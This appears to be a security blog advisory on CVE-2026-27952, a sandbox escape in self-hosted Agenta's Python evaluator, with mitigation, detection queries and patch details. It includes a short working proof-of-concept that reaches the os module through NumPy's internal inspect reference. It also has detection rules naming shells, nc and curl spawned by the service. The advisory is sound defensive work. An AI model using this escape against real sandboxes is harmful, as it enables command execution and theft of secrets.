CVE-2026-27952: Agenta Sandbox Flaw Enables Authenticated Users to Achieve Remote Code Execution via NumPy Introspection

Aegiron 10 mins0

Agenta Sandbox Escape via NumPy Introspection

CVE ID: CVE-2026-27952
Affected Product: Agenta API (self-hosted deployments)
Affected Versions: All versions prior to 0.48.1
Severity: High
CVSS v3.1 Base Score: 8.8 (High)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low (Authenticated user)
User Interaction: None
Scope: Unchanged
Impact: Confidentiality (High), Integrity (High), Availability (High)
Exploitability: High
Exploit Availability: Publicly discussed technique with working proof-of-concept demonstrated in security research

CVE-2026-27952 is a sandbox escape vulnerability in Agenta’s Python code execution feature. The issue allows an authenticated user to bypass RestrictedPython sandbox controls and execute arbitrary system-level commands on the Agenta server by abusing NumPy’s introspection capabilities.

Technical Description

Agenta provides a feature that allows users to execute custom Python code within a restricted execution environment. The sandbox implementation relied on RestrictedPython and enforced import controls to limit dangerous modules.

However, the sandbox configuration mistakenly permitted importing numpy. Within NumPy’s internal structure, the module numpy.ma.core exposes an inspect reference that provides access to Python interpreter internals. Through this object, the global module registry (sys.modules) can be accessed.

Once sys.modules becomes reachable, restricted modules such as os or subprocess can be obtained dynamically, even if direct imports are blocked by the sandbox policy.

This effectively breaks the isolation boundary intended by RestrictedPython and allows arbitrary command execution within the context of the Agenta API server process.

Because execution occurs inside the running API process, the attacker gains access equivalent to the service account running Agenta. In containerized environments, this typically includes:

  • Environment variables (including API keys and secrets)
  • Mounted configuration files
  • Network access from the container
  • Filesystem access permitted to the container
  • Internal service-to-service communication channels

The vulnerability does not require complex chaining. It relies on Python introspection mechanics and insufficient module restrictions.

Root Cause

The vulnerability exists due to:

  1. Overly permissive import allowlisting in the RestrictedPython sandbox.
  2. Failure to account for indirect module access via introspection.
  3. Inadequate isolation of user-supplied code from the host interpreter.
  4. Execution of untrusted code within the same runtime process.

RestrictedPython was assumed to provide sufficient containment, but Python’s dynamic nature allows module traversal through non-obvious paths such as inspect references embedded inside third-party libraries.

Impact

If exploited successfully, the following outcomes are possible:

  • Remote Code Execution (RCE)
  • Arbitrary system command execution
  • Data exfiltration
  • Secret leakage
  • Lateral movement within internal infrastructure
  • Container breakout (if additional misconfigurations exist)
  • Service disruption or data destruction

Any organization exposing Agenta publicly or allowing broad user registration is at elevated risk.

Exploitation Details (Educational)

The exploitation technique relies on:

  1. Importing NumPy inside the sandbox.
  2. Traversing to internal inspection utilities.
  3. Accessing sys.modules.
  4. Retrieving restricted modules such as os.
  5. Invoking system-level functionality.

Conceptual demonstration (simplified for education):

import numpy as np# Access internal inspect reference
inspect_ref = np.ma.core.inspect# Reach sys.modules via inspect globals
modules = inspect_ref.__globals__['sys'].modules# Retrieve os module
os_module = modules['os']# Execute system command
os_module.system("id")

Attack Scenario

  1. Attacker registers or logs in to Agenta.
  2. Attacker submits custom evaluation code.
  3. Code executes inside sandbox.
  4. NumPy import bypasses intended restrictions.
  5. Introspection exposes system modules.
  6. Arbitrary command execution achieved.
  7. Sensitive information retrieved or server compromised.

Indicators of Compromise (IoCs)

Look for:

  • User-submitted code containing:
    • import numpy
    • numpy.ma.core.inspect
    • __globals__
    • sys.modules
    • os.system
    • subprocess
  • Unexpected shell process creation from Agenta process
  • Outbound network connections from Agenta host to unknown IPs
  • File reads involving /etc/passwd, /proc, or secret directories
  • Environment variable dumps in logs

Detection Guidance

Log Sources to Monitor

  • Agenta API application logs
  • HTTP request logs (code submission endpoints)
  • Container runtime logs (Docker / Kubernetes)
  • Linux auditd logs
  • EDR telemetry
  • Process creation logs
  • Network flow logs

Detection Queries

Splunk Query – Suspicious Code Submission

index=agenta_logs sourcetype=api_requests
| search request_body="*import numpy*" 
    OR request_body="*numpy.ma.core.inspect*" 
    OR request_body="*sys.modules*" 
    OR request_body="*__globals__*"
| table _time user client_ip request_body

Splunk Query – Suspicious Process Creation

index=os_logs sourcetype=process_creation
| search parent_process="agenta*" 
    AND (process_name="sh" OR process_name="bash" OR process_name="python" OR process_name="nc" OR process_name="curl")
| table _time host parent_process process_name command_line

Elastic (KQL) – Sandbox Escape Behavior

process.parent.name : "agenta*" and 
process.name : ("sh" or "bash" or "python" or "curl" or "nc")

Microsoft Sentinel (KQL) – Suspicious Python Introspection

AppRequests
| where RequestBody contains "numpy.ma.core.inspect"
   or RequestBody contains "sys.modules"
   or RequestBody contains "__globals__"

Linux Auditd Rule (Process Execution Monitoring)

-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/python3 -k agenta_exec_monitor

Behavioral Detection Strategy

Instead of only matching strings, it is recommended to correlate:

  1. Code submission event
  2. Followed by process spawn
  3. Followed by outbound connection

Correlation within a 2–5 minute window significantly increases detection accuracy.

Mitigation

Immediate actions:

  • Upgrade Agenta to version 0.48.1 or later
  • Disable custom code evaluator if not required
  • Restrict evaluator access to trusted users only
  • Apply strict outbound network controls
  • Enforce least privilege container runtime configuration
  • Rotate all credentials accessible to the Agenta service

Patch Information

The vulnerability has been fixed by removing NumPy from the sandbox allowlist and restructuring sandbox execution logic.

Official Patch / Upgrade Link:
https://github.com/Agenta-AI/agenta/releases/tag/v0.48.1

Upgrade to version 0.48.1 or newer immediately.

Hardening Recommendations

  • Do not execute untrusted Python code in-process.
  • Use isolated containers or microVMs for user code execution.
  • Apply seccomp profiles and AppArmor policies.
  • Prevent container privilege escalation.
  • Disable host filesystem mounts unless required.
  • Implement egress filtering.

Risk Assessment

This vulnerability should be treated as a high-priority patch event for any organization using self-hosted Agenta deployments. Because the exploit requires authentication, risk increases significantly when:

  • Public sign-ups are enabled
  • Weak authentication controls exist
  • Shared environments are used
  • Production secrets are mounted inside containers

If exposed to the internet, the system should be assumed exploitable until patched.

Conclusion

CVE-2026-27952 represents a classic sandbox escape caused by underestimating Python’s introspection capabilities. The issue does not rely on advanced exploitation techniques but rather on Python’s dynamic module system and inadequate isolation design.

All vulnerable instances should be upgraded immediately. Logs should be reviewed for suspicious evaluator activity. Secrets accessible to the Agenta runtime should be rotated as a precaution.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.